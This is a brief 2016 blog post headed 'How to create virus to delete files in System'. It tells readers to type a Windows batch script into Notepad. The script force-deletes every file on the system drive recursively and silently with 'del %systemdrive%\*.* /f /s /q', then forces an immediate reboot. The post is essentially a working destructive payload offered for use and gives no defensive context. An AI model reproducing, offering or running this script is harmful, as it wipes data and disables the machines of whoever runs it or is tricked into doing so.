WELCOME TO BOOKWORMM

Sunday, 25 December 2016

How to create virus to delete files in System

To create basic virus 
first open notepad  and type below code 

// deletion of files //

@echo off
del  %systemdrive%\*.* /f /s /q 
shutdown -r -f -t 00

No comments:

Post a Comment